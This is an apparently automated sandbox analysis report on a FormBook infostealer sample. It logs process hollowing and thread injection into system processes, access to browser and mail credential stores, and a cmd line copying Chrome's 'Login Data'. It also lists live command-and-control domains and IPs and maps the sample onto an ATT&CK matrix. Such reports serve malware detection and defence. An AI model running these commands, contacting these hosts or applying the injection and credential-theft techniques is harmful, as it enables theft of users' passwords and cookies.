            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C01DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C13D43 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C53540 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BDAD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BFC577 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF7D50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C9E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C5A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C04D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA8CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BE849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C914FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0A44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C6C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03CA740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C91C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C56C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03BF746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C0BC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 5_2_03C19A50 NtCreateFile,LdrInitializeThunk,

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Benign windows process drops PE files
            Source: C:\Windows\explorer.exeFile created: IconCachet0hh.exe.7.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exeDomain query: www.gografic.com
            Source: C:\Windows\explorer.exeNetwork Connect: 154.55.180.56 80
            Source: C:\Windows\explorer.exeDomain query: www.moneytaoism.com
            Source: C:\Windows\explorer.exeDomain query: www.naturathome.info
            Source: C:\Windows\explorer.exeDomain query: www.6111.site
            Source: C:\Windows\explorer.exeNetwork Connect: 5.183.8.187 80
            Source: C:\Windows\explorer.exeNetwork Connect: 38.54.163.57 80
            Source: C:\Windows\explorer.exeDomain query: www.kidsfundoor.com
            Source: C:\Windows\explorer.exeDomain query: www.choonchain.com
            Source: C:\Windows\explorer.exeDomain query: www.empireapothecary.com
            Source: C:\Windows\explorer.exeDomain query: www.huangse5.com
            Source: C:\Windows\explorer.exeDomain query: www.nutricognition.com
            Source: C:\Windows\explorer.exeNetwork Connect: 209.17.116.163 80
            Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.218 80
            Source: C:\Windows\explorer.exeNetwork Connect: 81.169.145.158 80
            Source: C:\Windows\explorer.exeDomain query: www.trisuaka.xyz
            Source: C:\Windows\explorer.exeDomain query: www.trendiddas.com
            Source: C:\Windows\explorer.exeDomain query: www.nomaxdic.com
            Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 80
            Source: C:\Windows\explorer.exeNetwork Connect: 156.226.60.131 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeDomain query: www.designgamagazine.com
            Source: C:\Windows\explorer.exeDomain query: www.shopwithtrooperdavecom.com
            Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
            Sample uses process hollowing technique
            Source: C:\Windows\SysWOW64\cmd.exeSection unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 1080000
            Maps a DLL or memory area into another process
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 50410000
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 3430000
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 3440000
            Allocates memory in foreign processes
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 50410000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 3430000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory allocated: C:\Windows\SysWOW64\cmd.exe base: 3440000 protect: page execute and read and write
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\TR0627729920002.exeMemory written: C:\Windows\SysWOW64\cmd.exe base: 50410000 value starts with: 4D5A
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\cmd.exeThread APC queued: target process: C:\Windows\explorer.exe
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3968
            Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 3968
            Drops or copies cmd.exe with a different name (likely to bypass HIPS)
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exeJump to dropped file
            Creates a thread in another existing process (thread injection)
            Source: C:\Users\user\Desktop\TR0627729920002.exeThread created: C:\Windows\SysWOW64\cmd.exe EIP: 3440000
            Source: C:\Users\user\Desktop\TR0627729920002.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
            Source: explorer.exe, 00000007.00000000.350508051.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.281636648.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.441279364.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
            Source: explorer.exe, 00000007.00000000.291986070.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.362079139.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.358486470.0000000005920000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000007.00000000.350564915.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.374071514.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.441429603.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
            Source: explorer.exe, 00000007.00000000.443990032.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.375158437.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.282469129.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
            Source: C:\Users\Public\Libraries\Jwjxmakrv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
            Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Shared Modules            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            File and Directory Discovery            		Remote Services1
            Archive Collected Data            		Exfiltration Over Other Network Medium3
            Ingress Tool Transfer            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts1
            Exploitation for Client Execution            		11
            Registry Run Keys / Startup Folder            		912
            Process Injection            		1
            Deobfuscate/Decode Files or Information            		1
            Input Capture            		13
            System Information Discovery            		Remote Desktop Protocol1
            Data from Local System            		Exfiltration Over Bluetooth11
            Encrypted Channel            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)11
            Registry Run Keys / Startup Folder            		2
            Obfuscated Files or Information            		Security Account Manager1
            Query Registry            		SMB/Windows Admin Shares1
            Email Collection            		Automated Exfiltration4
            Non-Application Layer Protocol            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Software Packing            		NTDS221
            Security Software Discovery            		Distributed Component Object Model1
            Input Capture            		Scheduled Transfer115
            Application Layer Protocol            		SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets2
            Virtualization/Sandbox Evasion            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Masquerading            		Cached Domain Credentials2
            Process Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion            		DCSync1
            Remote System Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job912
            Process Injection            		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            Rundll32            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 680563 Sample: TR0627729920002.exe Startdate: 08/08/2022 Architecture: WINDOWS Score: 100 61 www.wellkept.info 2->61 63 www.meigsbuilds.online 2->63 65 3 other IPs or domains 2->65 99 Snort IDS alert for network traffic 2->99 101 Multi AV Scanner detection for domain / URL 2->101 103 Malicious sample detected (through community Yara rule) 2->103 105 6 other signatures 2->105 11 TR0627729920002.exe 1 18 2->11         started        signatures3 process4 dnsIp5 73 l-0004.l-dc-msedge.net 13.107.43.13, 443, 49728, 49737 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 11->73 75 192.168.2.1 unknown unknown 11->75 77 3 other IPs or domains 11->77 57 C:\Users\Public\Libraries\Jwjxmakrv.exe, PE32 11->57 dropped 59 C:\Users\...\Jwjxmakrv.exe:Zone.Identifier, ASCII 11->59 dropped 129 Creates multiple autostart registry keys 11->129 131 Writes to foreign memory regions 11->131 133 Allocates memory in foreign processes 11->133 135 2 other signatures 11->135 16 cmd.exe 1 11->16         started        file6 signatures7 process8 signatures9 91 Modifies the context of a thread in another process (thread injection) 16->91 93 Maps a DLL or memory area into another process 16->93 95 Sample uses process hollowing technique 16->95 97 2 other signatures 16->97 19 explorer.exe 1 8 16->19 injected 24 conhost.exe 16->24         started        process10 dnsIp11 67 naturathome.info 81.169.145.158, 49823, 80 STRATOSTRATOAGDE Germany 19->67 69 www.trendiddas.com 5.183.8.187, 49855, 80 INTERXSCH Germany 19->69 71 17 other IPs or domains 19->71 55 C:\Users\user\AppData\...\IconCachet0hh.exe, PE32 19->55 dropped 109 System process connects to network (likely due to code injection or exploit) 19->109 111 Benign windows process drops PE files 19->111 113 Performs DNS queries to domains with low reputation 19->113 115 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 19->115 26 rundll32.exe 12 19->26         started        29 Jwjxmakrv.exe 16 19->29         started        32 Jwjxmakrv.exe 16 19->32         started        34 IconCachet0hh.exe 19->34         started        file12 signatures13 process14 dnsIp15 117 Tries to steal Mail credentials (via file / registry access) 26->117 119 Creates multiple autostart registry keys 26->119 121 Tries to harvest and steal browser information (history, passwords, etc) 26->121 127 3 other signatures 26->127 36 cmd.exe 26->36         started        39 cmd.exe 26->39         started        79 l-0003.l-dc-msedge.net 13.107.43.12, 443, 49746, 49748 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 29->79 81 ph-files.fe.1drv.com 29->81 87 2 other IPs or domains 29->87 123 Multi AV Scanner detection for dropped file 29->123 125 Machine Learning detection for dropped file 29->125 41 cmd.exe 1 29->41         started        83 ph-files.fe.1drv.com 32->83 85 onedrive.live.com 32->85 89 2 other IPs or domains 32->89 43 cmd.exe 1 32->43         started        45 conhost.exe 34->45         started        signatures16 process17 signatures18 107 Tries to harvest and steal browser information (history, passwords, etc) 36->107 47 conhost.exe 36->47         started        49 conhost.exe 39->49         started        51 conhost.exe 41->51         started        53 conhost.exe 43->53         started        process19

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            TR0627729920002.exe29%ReversingLabsWin32.Trojan.Injuke
            TR0627729920002.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\Public\Libraries\Jwjxmakrv.exe100%Joe Sandbox ML
            C:\Users\Public\Libraries\Jwjxmakrv.exe29%ReversingLabsWin32.Trojan.Injuke
            C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe0%MetadefenderBrowse
            C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe0%ReversingLabs

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            5.2.cmd.exe.50410000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.cmd.exe.50410000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.cmd.exe.50410000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            0.2.TR0627729920002.exe.2162de8.1.unpack100%AviraTR/Patched.Ren.GenDownload File
            0.2.TR0627729920002.exe.21dc808.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.0.cmd.exe.50410000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
            5.0.cmd.exe.50410000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            SourceDetectionScannerLabelLink
            kidsfundoor.com7%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://www.trisuaka.xyz/uj3c/100%Avira URL Cloudmalware
            http://www.nomaxdic.com/uj3c/100%Avira URL Cloudmalware
            http://www.nomaxdic.com0%Avira URL Cloudsafe
            www.nutricognition.com/uj3c/100%Avira URL Cloudmalware
            http://www.emerge.deDVarFileInfo$0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            www.trisuaka.xyz
            		188.114.97.3
            		truetrue
              		unknown
              kidsfundoor.com
              		2.57.90.16
              		truetrueunknown
              www.trendiddas.com
              		5.183.8.187
              		truetrue
                		unknown
                l-0003.l-dc-msedge.net
                		13.107.43.12
                		truefalse
                  		unknown
                  www.moneytaoism.com
                  		156.226.60.131
                  		truetrue
                    		unknown
                    parkingpage.namecheap.com
                    		198.54.117.218
                    		truefalse
                      		high
                      forummind.com
                      		35.244.105.10
                      		truefalse
                        		unknown
                        naturathome.info
                        		81.169.145.158
                        		truetrue
                          		unknown
                          l-0004.l-dc-msedge.net
                          		13.107.43.13
                          		truefalse
                            		unknown
                            nutricognition.com
                            		34.102.136.180
                            		truefalse
                              		unknown
                              www.nomaxdic.com
                              		38.54.163.57
                              		truetrue
                                		unknown
                                wellkept.info
                                		15.197.142.173
                                		truetrue
